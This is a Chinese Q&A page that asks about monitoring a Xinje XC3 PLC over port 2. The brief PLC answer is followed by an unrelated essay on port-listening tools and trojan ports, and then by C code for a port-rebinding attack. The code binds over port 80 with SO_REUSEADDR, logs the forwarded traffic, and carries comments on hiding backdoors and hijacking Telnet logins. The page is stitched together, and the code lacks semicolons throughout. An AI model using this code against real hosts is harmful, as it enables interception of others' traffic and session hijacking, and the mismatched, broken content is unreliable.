信捷xc3如何通过端口2监控程序

通过端口2监控程序。

1、先打开信捷xc3里的PLC编程软件，将用下载线连接号电脑与PLC，给PLC上电。

2、然后用编程软件吧PLC里的程序上传到电脑中，再在线监视，就可以了。

分类: 电脑/网络 >>软件

解析:

很多人都已经知道了可以借助NETSTAT -AN来查看当前的连接与开放的端口，但NETSTAT并不万能，比如你的Win95遭到OOB攻击的时候，不等NETSTAT你就已经死机了。为此，出现了一种特殊的小工具——端口监听程序。端口监听并不是一项复杂的技术，但却能解决一些局部问题，当OOB攻击风行的时候，有些程序员期望借助端口监听的简单方式堵住这一漏洞，于是就有了象ICMPWATCH、ANTINUKE、NUKENABER等工具，而后来BO、NETBUS等流行起来，也有人试图通过NUKENABER来监听12345、31337这样的端口，来发现木马并防止黑客的攻击，后来出现的一些专门针对BO设计的程序，如BS120的前期版本也主要是依靠端口监听的方法，当然随着木马的日趋泛滥和木马Server端端口的可定义性，这种方法还是被放弃了。

不过值得一提的是ANTINUKE，这虽然是一个只有几十K的小程序，但他带有一个反击的功能，就是说，会用OOB攻击的方式反击发包向你139端口的人，而且它会使HACKTEK这样的扫描器在扫描到139时发生溢出而终止，大家不妨实验一下。

NUKENABER的优点在于他可以监听多个端口，Port magic也有这样的功能。

另外需要说明的是，端口监听还用于实现对共享目录访问的监测和控制，我们都知道远程访问一台机器的共享目录实际是访问139端口，那么只要对本机139的监听就可以察觉对远程的访问请求，这样的软件有很多，如ProtectX、NetAlert等等，他们的功能比较近似，都可以记录或显示试图连接你机器的IP地址并发出警告，可以让你选择拒绝还是允许。

有些端口监听工具，不仅可以被动监听，也提供了一些有意思的功能，比如fakeserv让你的机器开放多个端口，使扫描者误认为你开放了Wingate、TELNET等多种服务，忙了一塌糊涂，结果才发现是个骗局。不仅浪费时间，而且还被你记录了IP。还有的让你的机器开放12345、31337等端口，待到有人用木马的客户端连接上来时，就发给他警告信息或利用木马本身的漏洞让他死机。

端口扫描器的缺陷就是只能监视固定的端口，面对越发恶劣的安全环境，仅仅凭借简单的端口监控程序是不够的。

看看有没有用

==============

#include "stdafx.h"

#include <winsock2.h>

#include <windows.h>

//#include <stdio.h>

#include <stdlib.h>

#include <fstream.h>

DWORD WINAPI ClientThread(LPVOID lpParam)

int main(int argc, char* argv[])

{

if (argc!=2)

{

printf("using: listen [your ip address]\nfor example:\n listen 202.112.246.2\n")

return 0

}

WORD wVersionRequested

DWORD ret

WSADATA wsaData

BOOL val

SOCKADDR_IN saddr

SOCKADDR_IN scaddr

int err

SOCKET s

SOCKET sc

int caddsize

HANDLE mt

DWORD tid

wVersionRequested = MAKEWORD( 2, 2 )

err = WSAStartup( wVersionRequested, &wsaData )

if ( err != 0 ) {

printf("error!WSAStartup failed!\n")

return -1

}

saddr.sin_family = AF_INET

//截听虽然也可以将地址指定为INADDR_ANY，但是要不能影响正常应用情况下，应该指定具体的IP，留下127.0.0.1给正常的服务应用，然后利用这个地址进行转发，就可以不影响对方正常应用了

saddr.sin_addr.s_addr = inet_addr(argv[1])

saddr.sin_port = htons(80)

if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)

{

printf("error!socket failed!\n")

return -1

}

val = TRUE

//SO_REUSEADDR选项就是可以实现端口重绑定的

if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)

{

printf("error!setsockopt failed!\n")

return -1

}

//如果指定了SO_EXCLUSIVEADDRUSE，就不会绑定成功，返回无权限的错误代码；

//如果是想通过重利用端口达到隐藏的目的，就可以动态的测试当前已绑定的端口哪个可以成功，就说明具备这个漏洞，然后动态利用端口使得更隐蔽

//其实UDP端口一样可以这样重绑定利用，这儿主要是以TELNET服务为例子进行攻击

if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)

{

ret=GetLastError()

printf("error!bind failed!\n")

return -1

}

listen(s,2)

while(1)

{

caddsize = sizeof(scaddr)

//接受连接请求

sc = accept(s,(struct sockaddr *)&scaddr,&caddsize)

if(sc!=INVALID_SOCKET)

{

mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid)

if(mt==NULL)

{

printf("Thread Creat Failed!\n")

break

}

}

CloseHandle(mt)

}

closesocket(s)

WSACleanup()

return 0

}

DWORD WINAPI ClientThread(LPVOID lpParam)

{

SOCKET ss = (SOCKET)lpParam

SOCKET sc

char buf[4096]

SOCKADDR_IN saddr

long num

DWORD val

DWORD ret

//如果是隐藏端口应用的话，可以在此处加一些判断

//如果是自己的包，就可以进行一些特殊处理，不是的话通过127.0.0.1进行转发

saddr.sin_family = AF_INET

saddr.sin_addr.s_addr = inet_addr("127.0.0.1")

saddr.sin_port = htons(80)

if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)

{

printf("error!socket failed!\n")

return -1

}

val = 100

if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)

{

ret = GetLastError()

return -1

}

if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)

{

ret = GetLastError()

return -1

}

if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)

{

printf("error!socket connect failed!\n")

closesocket(sc)

closesocket(ss)

return -1

}

// 写入文件:

ofstream oFile("port80log.txt")

if(!oFile)

{

printf("cannot write to the file.\n")

closesocket(ss)

closesocket(sc)

return 0

}

while(1)

{

//下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上，并把应答的包再转发回去。

//如果是嗅探内容的话，可以再此处进行内容分析和记录

//如果是攻击如TELNET服务器，利用其高权限登陆用户的话，可以分析其登陆用户，然后利用发送特定的包以劫持的用户身份执行。

num = recv(ss,buf,4096,0)

if(num>0)

{

oFile<<"\n== DATA =========================================\n"

oFile<<buf

send(sc,buf,num,0)

}

else if(num==0)

break

num = recv(sc,buf,4096,0)

if(num>0)

{

oFile<<"\n== DATA =========================================\n"

oFile<<buf

send(ss,buf,num,0)

}

else if(num==0)

break

}

oFile.close()

closesocket(ss)

closesocket(sc)

return 0

}

---